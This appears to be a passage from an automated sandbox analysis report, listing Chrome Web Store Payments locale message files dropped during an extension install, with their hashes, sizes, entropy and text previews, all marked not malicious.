                                                                                                                                                                SHA-256:D1467B8D037114403E8F4EFC52E88C4A7FEB96126BE4CFF883FEFF1084EF7E68
                                                                                                                                                                SHA-512:ED9319830314385D09C06F62EE34186E8CA576C857981205E4468A28B3ACD2AB03384E77B866032C324ABDD97A56EFD08E2D6E0C79D563578B3EC52517819BD8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome . ... ..".. },.. "app_name": {.. "message": "Chrome . ... ..".. },.. "craw_app_unavailable": {.. "message": ".. .. ... . .....".. },.. "craw_connect_to_network": {.. "message": "..... ......".. },.. "iap_unavailable": {.. "message": ".. .. ... ... . .....".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome. .......".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\lt\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):665
                                                                                                                                                                Entropy (8bit):4.66839186029557
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJpqHnkGGpqHnk+WYpU346M+dgV6O8ZpU34WzSWz03OyZnLAOfTYx:1HELqHtKqHPWYpM3A8ZpwGzOGAOfg
                                                                                                                                                                MD5:4CA644F875606986A9898D04BDAE3EA5
                                                                                                                                                                SHA1:722A10569E93975129D67FBDB75B537D9D622AD1
                                                                                                                                                                SHA-256:7C311AB751D840D750C11553C083785813E079C1D464FE568A98C9E3EF3DB96C
                                                                                                                                                                SHA-512:E575E3D0622F5BD4B6C0EE79128A1B1F1882195670139D1983F4377D847141B8FB8EBB8BCED82AF3A220ED07D3577AFBE085BADC0E9C7678292B80E3EC5D3444
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "app_name": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "craw_app_unavailable": {.. "message": "Programa .iuo metu negalima.".. },.. "craw_connect_to_network": {.. "message": "Prisijunkite prie tinklo.".. },.. "iap_unavailable": {.. "message": "Mok.jimai programoje .iuo metu negalimi.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prisijunkite prie .Chrome..".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\lv\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):671
                                                                                                                                                                Entropy (8bit):4.631774066483956
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJFhVbGGFhVb+WYpU34wDoz+dgGedBO8ZpU34wF03OyZnLAOfTYGYID:1HENQKkWYp2Doy/em8Zp2WOGAOfRYID
                                                                                                                                                                MD5:C5CE2C51391EAFD3DA9E4C71549A3C28
                                                                                                                                                                SHA1:1F67FF6EF6E90C0CE3AAF56ED543A3EFD381574D
                                                                                                                                                                SHA-256:1FA1DF2CA8516DEF490FB8484E9AA498ACFF80EEF5C9258FFE42D3678E6C7DED
                                                                                                                                                                SHA-512:C85F6281E682F52BC2147DEA7E2F3BB4DC48D98BADA8687B05C6C7271C78EA7F5431CD51671A4184C9AE004FC53C016E3C594697F483195CCBA08A93821EEF70
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "app_name": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "craw_app_unavailable": {.. "message": "Lietotne pagaid.m nav pieejama.".. },.. "craw_connect_to_network": {.. "message": "L.dzu, izveidojiet savienojumu ar t.klu.".. },.. "iap_unavailable": {.. "message": "Maks.jumi lietotn.s pa.laik nav pieejami.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "L.dzu, pierakstieties p.rl.k. Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\nb\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):501
                                                                                                                                                                Entropy (8bit):4.804937629013952
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:YGGYpB928UZjdyE9iDCiop8682fURHWO/NrnLAOK:YHYpXK/iOiop8NFHWOFvAOK
                                                                                                                                                                MD5:8F0168B9A546D5A99FD8A262C975C80E
                                                                                                                                                                SHA1:B0718071BD0B7251D4459E9C87DF50C14622FBD6
                                                                                                                                                                SHA-256:F03FA7384DF79EBA6E0274D570996030F595A3BF6B781929DD9DB6593262E41F
                                                                                                                                                                SHA-512:A1191CDC496DDD7470BDCFAF186BB9488767159E0CA6A6242D195FA3351704DC8F8BBD03DBEE57D37BBD897C9E8D14B7325FB37D58AC80DEC0F972FF893758B8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"craw_app_unavailable":{"message":"Appen er utilgjengelig for \u00f8yeblikket."},"craw_connect_to_network":{"message":"Du m\u00e5 koble til et nettverk."},"app_name":{"message":"Chrome Nettmarked-betalinger"},"app_description":{"message":"Chrome Nettmarked-betalinger"},"iap_unavailable":{"message":"Betaling i app er ikke tilgjengelig for \u00f8yeblikket."},"please_sign_in":{"message":"Du m\u00e5 logge p\u00e5 Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\nl\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):615
                                                                                                                                                                Entropy (8bit):4.4715318546237315
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJJQGkbGGJQGkb+WYpU34OQKJT+dgiXUmvFZO8ZpU34g7JT03OyZnLAOfTYMD:1HErxkaqxk6WYptndXI8ZpTOGAOfbD
                                                                                                                                                                MD5:7A8F9D0249C680F64DEC7650A432BD57
                                                                                                                                                                SHA1:53477198AEE389F6580921B4876719B400A23CA1
                                                                                                                                                                SHA-256:92BE7C2DC9CFBE5A65E9CE6488D364C8D7EC19E7B67A31E4D43C1CB2B169671C
                                                                                                                                                                SHA-512:969AB979546A741C0F3EDBEEB21BABA375FA8870D4FB9248CDD4C305736E332E10CAB7B64C5C078E60EC0CD73848101B390BE8F44B89C310058AF4C1CA3C8AA7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Betalingen via Chrome Web Store".. },.. "app_name": {.. "message": "Betalingen via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App momenteel niet beschikbaar.".. },.. "craw_connect_to_network": {.. "message": "Maak verbinding met een netwerk.".. },.. "iap_unavailable": {.. "message": "In-app-betalingen is momenteel niet beschikbaar.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log in bij Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\pl\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):636
                                                                                                                                                                Entropy (8bit):4.646901997539488
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJbiVbGGbiVb+WYpU34OBHlBi9+dgQUg6O8ZpU34bdbfiIu03OyZnLAOfTYR5k:1HE5iVauiV6WYpIAYr8ZpxFiaOGAOfIC
                                                                                                                                                                MD5:0E6194126AFCCD1E3098D276A7400175
                                                                                                                                                                SHA1:E8127B905A640B1C46362FA6E1127BE172F4A40F
                                                                                                                                                                SHA-256:E2699F98C511B18A2AFB82EAE9A4804B646C4FF1077D80E77C17A3943A6373C2
                                                                                                                                                                SHA-512:A71F7C7BFBBF1E37E699601AF2E095C56CBA91F90CB7556477DF31D01B83ADFB1271E1775C9BA299FF6875BBFC2B6AB47488CC88E33DEF2F6F2E0E5AC687B777
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "app_name": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplikacja jest obecnie niedost.pna.".. },.. "craw_connect_to_network": {.. "message": "Po..cz si. z sieci..".. },.. "iap_unavailable": {.. "message": "P.atno.ci w ramach aplikacji s. teraz niedost.pne.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Zaloguj si. w Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\pt_BR\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):636
                                                                                                                                                                Entropy (8bit):4.515158874306633
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJsc/bGGsc/b+WYpU34OLw+dgn/KzO8ZpU34FjIBMwGRO03OyZnLAOfTYN+KcY:1HEb/a8/6WYp4mZ8Zp7cKlOGAOf2tD
                                                                                                                                                                MD5:86A2B91FA18B867209024C522ED665D5
                                                                                                                                                                SHA1:63DEC245637818C76655E01FCB6D59784BC7184E
                                                                                                                                                                SHA-256:6374880FDD1F8AF1EE8AEA6A06B73BE0AB265AFCEB4FE6F08BDE3B3989264B21
                                                                                                                                                                SHA-512:DA6DBDE5028756421C2904F605632EE98831A25A1247E6238A931629B94CE8A00FD76F4235F118D2167304BD60F2C06B2AD78E54FF6CE53F8C38DF8C7B5AFCE4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pagamentos da Chrome Web Store".. },.. "app_name": {.. "message": "Pagamentos da Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplicativo indispon.vel no momento.".. },.. "craw_connect_to_network": {.. "message": "Conecte-se a uma rede.".. },.. "iap_unavailable": {.. "message": "No momento, os Pagamentos no aplicativo n.o est.o dispon.veis.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Fa.a login no Google Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\pt_PT\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):622
                                                                                                                                                                Entropy (8bit):4.526171498622949
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJsZUkbGGsZUkb+WYpU34OAE+dgqxKzO8ZpU34rEpBfvPO03OyZnLAOfTYLD:1HEmUka5Uk6WYpFvdxZ8ZpSTnPlOGAOS
                                                                                                                                                                MD5:750A4800EDB93FBE56495963F9FB3B94
                                                                                                                                                                SHA1:8BFB915488A4EB3CB33D68E2E59F1F8447DB7D61
                                                                                                                                                                SHA-256:C1C94F65FABAF17DEF98A8587711A56D61B1E5607500E9B01F2824DB109F9E83
                                                                                                                                                                SHA-512:2AEDEF5793406221BE76AF22031CE8C30AB5FAEAED09BB394C153E2EBE990C89C1A2A73B40D8A92842641AFCA8C77FFD808A2058602D3646FD8DAE2844406F24
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pagamentos via Chrome Web Store".. },.. "app_name": {.. "message": "Pagamentos via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplica..o atualmente indispon.vel.".. },.. "craw_connect_to_network": {.. "message": "Ligue-se a uma rede.".. },.. "iap_unavailable": {.. "message": "Os Pagamentos na app est.o atualmente indispon.veis.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicie sess.o no Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\ro\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):641
                                                                                                                                                                Entropy (8bit):4.61125938671415
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJqJrJZGGqJrJZ+WYpU344HIx2Z+dgrVPlZO8ZpU34qT7hI3O03OyZnLAOfTYU:1HEC4D8WYpKow8WV68ZpKhoOGAOfoVGD
                                                                                                                                                                MD5:98D43E4B1054A65DF3FA3CC40AB6FB6D
                                                                                                                                                                SHA1:46E0A21C4DA2BB5D4D8F837AE211C1B6FA26E7E2
                                                                                                                                                                SHA-256:113A13900CBA62FE8AED06751971C23A80A99B47F9BE219CF884D57DB19611D9
                                                                                                                                                                SHA-512:A76DC53912A4F46714926B9EA2B22E909540E447F61F6DD72607AB7B3BB5D4A9B39E525B04C33AEC53BA813D14AC1FB5827275B2524E52B693E83171E1CD1466
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pl..i prin Magazinul web Chrome".. },.. "app_name": {.. "message": "Pl..i prin Magazinul web Chrome".. },.. "craw_app_unavailable": {.. "message": ".n prezent, aplica.ia nu este disponibil..".. },.. "craw_connect_to_network": {.. "message": "Conecteaz.-te la o re.ea.".. },.. "iap_unavailable": {.. "message": "Pl..ile .n aplica.ie nu sunt disponibile momentan.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Conecteaz.-te la Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\ru\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):744
                                                                                                                                                                Entropy (8bit):4.918620852166656
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJ7OJHZMSl3ZGG7OJHZMSl3Z+WYpU34zWJ2F+dgVtLSv/TO8ZpU347NWjT03On:1HElOJHZMq4uOJHZMq8WYpdWJ/YGHq8m
                                                                                                                                                                MD5:DB2EDF1465946C06BD95C71A1E13AE64
                                                                                                                                                                SHA1:FB4F3ECE9ECECEBBC6CA2A592A15FB9C1FDFB811
                                                                                                                                                                SHA-256:FBAF22CE6E16DE174CED8CB5EA3098CCA1C3426A2111FF33BD3E64DA64ED67AB
                                                                                                                                                                SHA-512:4E0CF00BAEF1757548DEB17BBE1AF55770A0A0F7351779EF55C7DEFA6D112D0227B8865C2C22E0EC62E6E2F1C8E1632A2D0CE6828D25C5ABBF143C990116F632
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "......... ....... ........-........ Chrome".. },.. "app_name": {.. "message": "......... ....... ........-........ Chrome".. },.. "craw_app_unavailable": {.. "message": ".......... ...........".. },.. "craw_connect_to_network": {.. "message": "............ . .....".. },.. "iap_unavailable": {.. "message": "....... ..... .......... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "....... . Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\sk\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):647
                                                                                                                                                                Entropy (8bit):4.640777810668463
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJfZGGfZ+WYpU34ORO+dgmmCO8ZpU34yH7u2Z03OyZnLAOfTYCUAi0D:1HEl4G8WYpetPmD8ZpcH7aOGAOfzUeD
                                                                                                                                                                MD5:8DF215D1EFBDABB175CCDD68ED8DCB0A
                                                                                                                                                                SHA1:2B374462137A38589A73FDD00A84CBDC7E50F9F4
                                                                                                                                                                SHA-256:7FA16AF97E6CFC52EC6008EB679D3F30E7E0C24F9EF2D18A9228EAF4DED9D63B
                                                                                                                                                                SHA-512:C0E623343BDAEB4731800D183B59F2FCFE285F0C7153EC99641FD84F2F2DCFE47D21E73F3D28B1240340453C5668EB0AFFBE087AAB62F1C88CD2A40CC44E599D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplik.cia moment.lne nie je dostupn..".. },.. "craw_connect_to_network": {.. "message": "Pripojte sa k sieti.".. },.. "iap_unavailable": {.. "message": "Platby v aplik.cii moment.lne nie s. k dispoz.cii.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prihl.ste sa do prehliada.a Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\sl\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):617
                                                                                                                                                                Entropy (8bit):4.5101656584816885
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJGcyvmbZGGGcyvmbZ+WYpU34OBOEtf+dgca1ZO8ZpU34GcQArERff03OyZnLh:1HE4cyY4TcyY8WYpNoWa1w8ZpQcQ6AfK
                                                                                                                                                                MD5:3943FA2A647AECEDFD685408B27139EE
                                                                                                                                                                SHA1:0129DD19D28373359530B3B477FE8A9279DABB7D
                                                                                                                                                                SHA-256:18AFF072EE0DF7C3495045435C752A805606E6D5D462EF2321C443F1773F4B3A
                                                                                                                                                                SHA-512:42E62B3855611FF2E1D39C11404CB1A09825EE4CA6A8ACB3FF538B4574388F549E3BD79137DD4DC128A8DC44DD270D7D878E4AAD20DA8250A5C25297B0DEC09D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pla.ila v spletni trgovini Chrome".. },.. "app_name": {.. "message": "Pla.ila v spletni trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenutno ni na voljo.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se z omre.jem.".. },.. "iap_unavailable": {.. "message": "Pla.ila v aplikacijah trenutno niso na voljo.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se v Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\sr\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):743
                                                                                                                                                                Entropy (8bit):4.913927107235852
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJssbdOGGssbdO+WYpU347xBP+dgcucO8ZpU34s1muP03OyZnLAOfTYzDYD:1HEKsb59sbTWYplx4Xud8Zpy1mNOGAOv
                                                                                                                                                                MD5:D485DF17F085B6A37125694F85646FD0
                                                                                                                                                                SHA1:24D51D8642CDC6EFD5D8D7A4430232D8CDE25108
                                                                                                                                                                SHA-256:7FFDE34C58E7C376C042DE64DEF6481DAE32BE8B70F0B18EDF536290CBE0C818
                                                                                                                                                                SHA-512:0DDECFD860E99290B6C3AAA04F510272AE081CF2D93ED5832D9D6378EC9D36177FFBE213471247FB94721EA34A83E7665669200047091D0FDE134E3D763217E7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "....... . Chrome ...-..........".. },.. "app_name": {.. "message": "....... . Chrome ...-..........".. },.. "craw_app_unavailable": {.. "message": ".......... .. ........ ...........".. },.. "craw_connect_to_network": {.. "message": "........ .. .......".. },.. "iap_unavailable": {.. "message": "....... . .......... .. ........ ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "......... .. . Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\sv\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):630
                                                                                                                                                                Entropy (8bit):4.52964089437422
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJJMkbGGJMkb+WYpU34OACwz+dgNPGFZO8ZpU34JgpXLSb03OyZnLAOfTYLdID:1HErMkaqMk6WYpTOcb8ZpDgdZOGAOf8Y
                                                                                                                                                                MD5:D372B8204EB743E16F45C7CBD3CAAF37
                                                                                                                                                                SHA1:C96C57219D292B01016B37DCF82E7C79AD0DD1E8
                                                                                                                                                                SHA-256:B8BA77E0089B0676545EC16D32468B727812B444F90B33A7A5B748E6C36C4388
                                                                                                                                                                SHA-512:33640529E0D5DCC5CA4BDB0615A2818E8D26C6FCB7B3474C08AC3EB67B9DB40E1F0A79954ED20728CD47A686D2533DCBC76ABCBDB917F8530C8DE8BBA687352E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Betalning via Chrome Web Store".. },.. "app_name": {.. "message": "Betalning via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Appen .r inte tillg.nglig f.r tillf.llet.".. },.. "craw_connect_to_network": {.. "message": "Anslut till ett n.tverk.".. },.. "iap_unavailable": {.. "message": "Betalning i appen .r inte tillg.ngligt f.r n.rvarande.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Logga in i Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\th\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):945
                                                                                                                                                                Entropy (8bit):4.801079428724355
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HEKa1dDa1/WYp6UFi72SmlG8ZpyactrW2SAOGAOfvSLD:WK2DNYp6U4y3bpyLxwGFW
                                                                                                                                                                MD5:83E2D1E97791A4B2C5C69926EFB629C9
                                                                                                                                                                SHA1:429600425CB0F196DDD717F940E94DBD8BFF2837
                                                                                                                                                                SHA-256:2FECA577F43D97BAEEA464741D585892103585208FD0A935B810A03BDCE83C88
                                                                                                                                                                SHA-512:60A5928DAA8CB4341487F477C56B5A98B83EDE50E5F4F55A802E01FDDAB86F3E795D391953D3D9214552D14D3F58C5A183693C613720FC12FC387D7B8F9B9AB6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "............... Chrome .........".. },.. "app_name": {.. "message": "............... Chrome .........".. },.. "craw_app_unavailable": {.. "message": ".............................".. },.. "craw_connect_to_network": {.. "message": ".........................".. },.. "iap_unavailable": {.. "message": "...............................................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "................. Chrome".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\tr\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):631
                                                                                                                                                                Entropy (8bit):4.710869622361971
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJ9Y8GG9Y8+WYpU34wWT+dgGb0GO8ZpU34wryd7T03OyZnLAOfTYGbPKG:1HE0jWYpyRnG8Zpyr/OGAOfFPn
                                                                                                                                                                MD5:2CEAE0567B6BB1D240BBAD690A98CA3B
                                                                                                                                                                SHA1:5944346FBD4A0797B13223895995CAB58E9ECD23
                                                                                                                                                                SHA-256:A7CB86F30C9C31FE5540282C308BA96ADB4EC16EF98C87129EB88105E5BEF5FC
                                                                                                                                                                SHA-512:108A07C6D03D7178E8D0FFEF5349E0249A898D864964FED8757BD8A08BC1C6D9613F2A6C01AA34A6606127D1C6CE14C229FA02586677DBB060B85E3E845950E1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome Web Ma.azas. .demeleri".. },.. "app_name": {.. "message": "Chrome Web Ma.azas. .demeleri".. },.. "craw_app_unavailable": {.. "message": "Uygulama .u anda kullan.lam.yor.".. },.. "craw_connect_to_network": {.. "message": "L.tfen bir a.a ba.lan.n.".. },.. "iap_unavailable": {.. "message": "Uygulama ..i .demeler .u anda kullan.lamaz.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "L.tfen Chrome'da oturum a..n.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\uk\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):720
                                                                                                                                                                Entropy (8bit):4.977397623063544
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJ7wILkSlXZGG7wILkSlXZ+WYpU34zb1Oy2P+dgSV1EjiTO8ZpU347qtfP2CTW:1HElwEkK4uwEkK8WYpd/dTV1e8Zptq5S
                                                                                                                                                                MD5:AB0B56120E6B38C42CC3612BE948EF50
                                                                                                                                                                SHA1:8B3F520E5713D9F116D68E71DAEED1F6E8D74629
                                                                                                                                                                SHA-256:68ABA284751EB9C856032062EF9B1651E2A1E5CE5FDA0977FFC97D63BA7BED9E
                                                                                                                                                                SHA-512:CD852A58217F739C1CD58567FF432D31A7AD3F68C884ABBA1DA95799BCD1545C6A5D3B06F319681C12B78AD0A709828DE4B22736316F148D21F5DB76A5BCCBEF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "....... ...-........ Chrome".. },.. "app_name": {.. "message": "....... ...-........ Chrome".. },.. "craw_app_unavailable": {.. "message": "........ ......... ...........".. },.. "craw_connect_to_network": {.. "message": "............. .. .......".. },.. "iap_unavailable": {.. "message": "....... ..... ........ ..... .. .........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "........ . Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\vi\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):695
                                                                                                                                                                Entropy (8bit):4.855375139026009
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJMAZrSFZGGMAZrSFZ+WYpU34WFHoz+dgdklzoO8ZpU34NFHoz03OyZnLAOfTU:1HEI4B8WYpAKytFZ8ZpXKMOGAOfd6D
                                                                                                                                                                MD5:7EBB677FEAD8557D3676505225A7249A
                                                                                                                                                                SHA1:F161B4B6001AEAEAB246FF8987F4D992B48D47BE
                                                                                                                                                                SHA-256:051F96ED874C11C4A13589B5F68964E4F5B03B52DDA223D56524F2CA23760C04
